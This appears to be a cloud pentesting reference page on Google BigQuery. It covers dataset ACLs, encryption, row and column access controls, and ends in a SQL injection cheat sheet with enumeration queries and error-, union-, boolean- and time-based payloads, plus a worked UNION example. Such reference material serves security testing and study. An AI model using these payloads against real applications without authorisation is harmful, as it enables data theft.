GCP - BigQuery Enum
Google Cloud BigQuery is a fully-managed, serverless enterprise data warehouse, offering capabilities for analysis over petabytes of data, thus handling large-scale datasets efficiently. As a Platform as a Service (PaaS), it provides users with infrastructure and tools to facilitate data management without the need for manual oversight.
It supports querying using ANSI SQL. The main objects are datasets, which contain tables, which in turn contain the SQL data.
By default a Google-managed encryption key is used, although it's possible to configure a Customer-managed encryption key (CMEK). The encryption key can be indicated per dataset and per table inside a dataset.
It's possible to set an expiration time on a dataset so that any new table created in it is automatically deleted the specified number of days after its creation.
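A minimal sketch of both settings with the bq CLI (project, key and dataset names are placeholders; note that --default_table_expiration is given in seconds):

```bash
# Create a dataset protected with a CMEK and with a default table expiration
bq mk --dataset \
  --default_kms_key "projects/<proj>/locations/<loc>/keyRings/<ring>/cryptoKeys/<key>" \
  --default_table_expiration 86400 \
  <proj>:<dataset>
```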
BigQuery is deeply integrated with other Google services. It's possible to load data from Cloud Storage buckets, Pub/Sub, Google Drive, Cloud SQL databases...
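For example, a sketch of loading a CSV file from a bucket into a table (bucket, dataset and table names are placeholders):

```bash
# Load a CSV from a Cloud Storage bucket, letting BigQuery autodetect the schema
bq load --source_format=CSV --autodetect <dataset>.<table> gs://<bucket>/<file>.csv
```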
When a dataset is created, ACLs are attached to it to grant access over it. By default the user that created the dataset is given Owner privileges, and then Owner is also granted to the group projectOwners (owners of the project), Writer to the group projectWriters, and Reader to the group projectReaders:
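These ACLs can be inspected with the bq CLI (dataset name is a placeholder); the access array contains entries similar to the defaults just described:

```bash
# Dump the dataset metadata, including its "access" ACL entries
bq show --format=prettyjson <proj>:<dataset>

# Example of the kind of entries returned inside "access":
#   {"role": "OWNER",  "specialGroup": "projectOwners"}
#   {"role": "OWNER",  "userByEmail": "<creator-email>"}
#   {"role": "WRITER", "specialGroup": "projectWriters"}
#   {"role": "READER", "specialGroup": "projectReaders"}
```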
It's possible to control which rows a principal is going to be able to access inside a table with row access policies. These are defined inside the table using DDL. The access policy defines a filter, and only the rows matching that filter are going to be accessible by the indicated principals.
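A minimal DDL sketch (project, dataset, table, column and principal are hypothetical):

```sql
-- Only alice will be able to see rows whose region column equals 'EU'
CREATE ROW ACCESS POLICY only_eu_rows
ON `<proj>.<dataset>.customers`
GRANT TO ('user:alice@example.com')
FILTER USING (region = 'EU');
```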
To restrict data access at the column level:

1. Define a taxonomy and policy tags. Create and manage a taxonomy and policy tags for your data: https://console.cloud.google.com/bigquery/policy-tags
2. Optional: Grant the Data Catalog Fine-Grained Reader role to one or more principals on one or more of the policy tags you created.
3. Assign policy tags to your BigQuery columns. In BigQuery, use schema annotations to assign a policy tag to each column where you want to restrict access.
4. Enforce access control on the taxonomy. Enforcing access control causes the access restrictions defined for all of the policy tags in the taxonomy to be applied.
5. Manage access on the policy tags. Use Identity and Access Management (IAM) policies to restrict access to each policy tag. The policy is in effect for each column that belongs to the policy tag.
When a user tries to access column data at query time, BigQuery checks the column policy tag and its policy to see whether the user is authorized to access the data.
In summary, to restrict access to some columns to some users, you can add a policy tag to the column in the schema, enforce access control on the taxonomy of that tag, and restrict which users have access to the tag (a sketch of the schema annotation is shown below).
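A rough sketch of how a policy tag is attached to a column through the schema and pushed with bq update (taxonomy/tag IDs, file and table names are placeholders):

```bash
# schema.json - the restricted column carries a policyTags annotation, e.g.:
# [
#   {"name": "name", "type": "STRING"},
#   {"name": "ssn",  "type": "STRING",
#    "policyTags": {"names": ["projects/<proj>/locations/<loc>/taxonomies/<tax-id>/policyTags/<tag-id>"]}}
# ]
bq update <proj>:<dataset>.<table> schema.json
```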
To enforce access control on the taxonomy, the corresponding service needs to be enabled:
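Presumably via the BigQuery Data Policy API (assuming that is the relevant service here):

```bash
gcloud services enable bigquerydatapolicy.googleapis.com
```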
It's possible to see the tags of columns with:
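One way to check them is dumping the table schema, where annotated columns carry a policyTags entry (project, dataset and table names are placeholders):

```bash
bq show --schema --format=prettyjson <proj>:<dataset>.<table>
```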
For further information you can check the blog post https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac; only some details are given here.
Comments:

- select 1#from here it is not working
- select 1/*between those it is not working*/
- But just the initial one won't work: select 1--from here it is not working
Get information about the environment such as:

- Current user: select session_user()
- Project id: select @@project_id
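A quick sketch of retrieving both in one query:

```sql
-- Returns the email of the calling identity and the current project id
SELECT session_user(), @@project_id
```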
Concat rows:

- All table names: string_agg(table_name, ', ')
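For example, concatenating every table name of a dataset into a single row (project and dataset are placeholders):

```sql
SELECT string_agg(table_name, ', ')
FROM `<proj>.<dataset>.INFORMATION_SCHEMA.TABLES`
```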
Get datasets, tables and column names (sketched in the queries below):

- Project and dataset name
- Column and table names of all the tables of the dataset
- Other datasets in the same project
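Assuming placeholder project and dataset names, these could look like:

```sql
-- Project and dataset name
SELECT table_catalog, table_schema
FROM `<proj>.<dataset>.INFORMATION_SCHEMA.COLUMNS` LIMIT 1

-- Column and table names of all the tables of the dataset
SELECT table_name, column_name
FROM `<proj>.<dataset>.INFORMATION_SCHEMA.COLUMNS`

-- Other datasets in the same project
SELECT schema_name
FROM `<proj>`.INFORMATION_SCHEMA.SCHEMATA
```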
SQL Injection types:

- Error based - casting: select CAST(@@project_id AS INT64)
- Error based - division by zero: ' OR if(1/(length((select('a')))-1)=1,true,false) OR '
- Union based (you need to use ALL in BigQuery): UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
- Boolean based: ' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
- Potential time based - Usage of public datasets, example: SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000
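As a rough illustration of how these payloads are used (hypothetical backend query and identifiers), a union-based injection into a string parameter could look like:

```sql
-- Hypothetical backend query: SELECT title FROM `proj.ds.posts` WHERE id = '<INPUT>'
-- Injected value; the trailing quote of the original query closes the 'posts' string:
' UNION ALL SELECT column_name FROM `proj.ds.INFORMATION_SCHEMA.COLUMNS` WHERE table_name='posts
```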
Documentation:
Scripting statements: https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting